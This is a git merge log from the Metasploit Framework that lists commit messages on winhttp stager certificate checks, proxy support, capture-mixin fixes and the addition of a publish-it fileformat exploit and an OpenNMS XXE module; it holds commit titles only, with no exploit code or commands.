    Land rapid7#4930, @hmoore-r7 winhttp stager certificate check

commit 085e6cc
Author: jakxx <jakx.ppr@gmail.com>
Date:   Tue Mar 17 16:39:56 2015 -0400

    Implemented Recommended Changes

    -corrected spelling error
    -set only option to required
    -dumped header data to included file
    -Used Rex for jmp values

commit 0490af8
Author: jstnkndy <jstnkndy@gmail.com>
Date:   Tue Mar 17 10:20:22 2015 -0400

    Added error checks, randomness, and uuid delimiter

commit f3fc400
Author: jstnkndy <jstnkndy@gmail.com>
Date:   Tue Mar 17 10:19:40 2015 -0400

    typo

commit b92d243
Merge: e0a7f53 766a07a
Author: jstnkndy <jstnkndy@gmail.com>
Date:   Tue Mar 17 10:18:32 2015 -0400

    Merge branch 'module-cve-2015-0975' of https://github.com/jstnkndy/metasploit-framework into module-cve-2015-0975

commit e0a7f53
Author: jstnkndy <jstnkndy@gmail.com>
Date:   Tue Mar 17 10:10:51 2015 -0400

    Added error checking, randomness, uuid delimiters

commit 2ea9844
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Mar 16 14:08:01 2015 -0500

    while(true)->loop, use thread.join

commit 5fd3637
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Mar 16 14:00:51 2015 -0500

    Remove the i32 size specifier (not needed)

commit 69d9280
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Mar 16 13:52:13 2015 -0500

    Fix yard docs, retries, push.i8 instructions. See commit 0513852

    Note that StagerRetryCount is not defined here, but will be in the parent class once rapid7#4934 lands

commit 0513852
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Mar 16 13:35:36 2015 -0500

    Fix yard docs, fix retries, trim bytes, retested and working

commit 69a808b
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Mar 16 12:14:42 2015 -0500

    StagerProxy -> PayloadProxy

commit f361e4e
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Mar 16 00:22:10 2015 -0500

    Prefer the new-style proxy datastore options when available

commit 7e89281
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Mar 16 00:03:31 2015 -0500

    Adds proxy (with authentication) support to reverse_http(s)

commit 8e37342
Author: HD Moore <hd_moore@rapid7.com>
Date:   Sat Mar 14 16:52:04 2015 -0500

    Comment typo

commit 0d12ca4
Author: HD Moore <hd_moore@rapid7.com>
Date:   Sat Mar 14 16:19:13 2015 -0500

    Work around lack of option normalization during size calculation

commit 03019cf
Author: HD Moore <hd_moore@rapid7.com>
Date:   Sat Mar 14 15:53:21 2015 -0500

    Adds StagerVerifySSLCert support (SHA1 of HandlerSSLCert)

commit 1159380
Author: HD Moore <hd_moore@rapid7.com>
Date:   Sat Mar 14 15:52:23 2015 -0500

    Move X509 PEM parsing into Rex::Parser::X509Certificate

commit 1001061
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 4 18:52:18 2015 -0600

    Initialize @capture_count

commit 1b1716b
Author: HD Moore <hd_moore@rapid7.com>
Date:   Sun Feb 22 22:01:01 2015 -0600

    Fix a handful of bugs that broke this module. Fixes rapid7#4799

commit 9730a16
Author: HD Moore <hd_moore@rapid7.com>
Date:   Sun Feb 22 22:00:42 2015 -0600

    Small cleanups to the LLMNR responder module

commit bdd5276
Author: HD Moore <hd_moore@rapid7.com>
Date:   Sun Feb 22 21:53:47 2015 -0600

    This fixes a number of issues with the Capture mixin

     * The use of www.metasploit.com in a datastore option results in a DNS lookup (infoleak). Switch to 8.8.8.8 (TTL=1)
     * The hacky code around #each_packet is no longer necessary in newer Ruby versions
     * The arp()/probe_gateway() calls to inject_reply() had broken logic leading to early exit and missed replies
     * The arp() function now tries up to three times to get a reply (helpful with lossy L2)
     * GC.start is extraneous and should be removed
     * Increased timeouts

commit 615d71d
Author: HD Moore <hd_moore@rapid7.com>
Date:   Sun Feb 22 21:51:33 2015 -0600

    Remove extraneous calls to GC.start()

commit 44a7e7e
Author: jakxx <jakx.ppr@gmail.com>
Date:   Wed Feb 18 13:22:54 2015 -0500

    publish-it fileformat exploit

commit 766a07a
Author: jstnkndy <jstnkndy@gmail.com>
Date:   Tue Jan 13 22:08:08 2015 -0500

    Add CVE-2015-0975 XXE for OpenNMS <= 14.0.2